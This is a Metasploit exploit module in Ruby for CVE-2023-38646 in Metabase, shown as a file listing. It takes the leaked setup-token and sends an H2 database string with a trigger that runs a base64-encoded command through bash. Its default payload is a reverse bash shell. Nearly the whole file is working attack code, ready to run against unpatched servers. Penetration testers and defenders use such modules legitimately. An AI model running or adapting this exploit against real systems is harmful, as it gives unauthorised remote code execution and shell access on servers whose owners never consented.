h00die
160 lines
6.0 KiB
Ruby
160 lines
6.0 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Metabase Setup Token RCE',
|
|
'Description' => %q{
|
|
Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
|
|
is accessible even after the setup process has been completed. With this token
|
|
a user is able to submit the setup functionality to create a new database.
|
|
When creating a new database, an H2 database string is created with a TRIGGER
|
|
that allows for code execution. We use a sample database for our connection
|
|
string to prevent corrupting real databases.
|
|
|
|
Successfully tested against Metabase 0.46.6.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'h00die', # msf module
|
|
'Maxwell Garrett', # original PoC, analysis
|
|
'Shubham Shah' # original PoC, analysis
|
|
],
|
|
'References' => [
|
|
['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],
|
|
['URL', 'https://www.metabase.com/blog/security-advisory'],
|
|
['CVE', '2023-38646']
|
|
],
|
|
'Platform' => ['unix'],
|
|
'Privileged' => false,
|
|
'Arch' => ARCH_CMD,
|
|
'DefaultOptions' => {
|
|
'PAYLOAD' => 'cmd/unix/reverse_bash'
|
|
# for docker payload/cmd/unix/reverse_netcat also works, but no perl/python
|
|
},
|
|
'Targets' => [
|
|
[ 'Automatic Target', {}]
|
|
],
|
|
'DisclosureDate' => '2023-07-22',
|
|
'DefaultTarget' => 0,
|
|
'Notes' => {
|
|
'Stability' => [CRASH_SAFE],
|
|
'Reliability' => [REPEATABLE_SESSION],
|
|
'SideEffects' => [IOC_IN_LOGS]
|
|
}
|
|
)
|
|
)
|
|
register_options(
|
|
[
|
|
Opt::RPORT(3000),
|
|
OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
|
|
]
|
|
)
|
|
end
|
|
|
|
def get_bootstrap_json_blob_from_html_resp(html)
|
|
%r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
|
|
begin
|
|
JSON.parse(Regexp.last_match(1))
|
|
rescue JSON::ParserError, TypeError
|
|
print_bad('Unable to parse JSON blob')
|
|
nil
|
|
end
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path),
|
|
'method' => 'GET'
|
|
)
|
|
|
|
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
|
|
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
|
|
|
|
json = get_bootstrap_json_blob_from_html_resp(res.body)
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
|
|
version = json.dig('version', 'tag')
|
|
return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
|
|
|
|
# typically v0.46.6
|
|
version = version.gsub('v', '')
|
|
|
|
if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')
|
|
return CheckCode::Appears("Version Detected: #{version}")
|
|
end
|
|
|
|
CheckCode::Safe("Version not vulnerable: #{version}")
|
|
end
|
|
|
|
def exploit
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path),
|
|
'method' => 'GET'
|
|
)
|
|
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
|
|
json = get_bootstrap_json_blob_from_html_resp(res.body)
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
|
|
setup_token = json['setup-token']
|
|
if setup_token.nil?
|
|
print_status('Setup token is nil, checking secondary location')
|
|
res = send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),
|
|
'method' => 'GET'
|
|
)
|
|
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
|
|
json = res.get_json_document
|
|
setup_token = json['setup-token']
|
|
end
|
|
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?
|
|
print_good("Found setup token: #{setup_token}")
|
|
|
|
print_status('Sending exploit (may take a few seconds)')
|
|
# our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
|
|
b64_pe = ::Base64.strict_encode64(payload.encoded)
|
|
equals_count = b64_pe.count('=')
|
|
if equals_count > 0
|
|
b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
|
|
end
|
|
|
|
send_request_cgi(
|
|
'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),
|
|
'method' => 'POST',
|
|
'ctype' => 'application/json',
|
|
'data' => {
|
|
'token' => setup_token,
|
|
'details' =>
|
|
{
|
|
# 'is_on_demand' => false, # without this, the shell takes ~20 sec longer to get
|
|
# 'is_full_sync' => false,
|
|
# 'is_sample' => false,
|
|
# 'cache_ttl' => nil,
|
|
# 'refingerprint' => false,
|
|
# 'auto_run_queries' => true,
|
|
# 'schedules' => {},
|
|
'details' =>
|
|
{
|
|
'db' => "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
|
|
'advanced-options' => false,
|
|
'ssl' => true
|
|
},
|
|
'name' => Rex::Text.rand_text_alphanumeric(6..12),
|
|
'engine' => 'h2'
|
|
}
|
|
}.to_json
|
|
)
|
|
end
|
|
end
|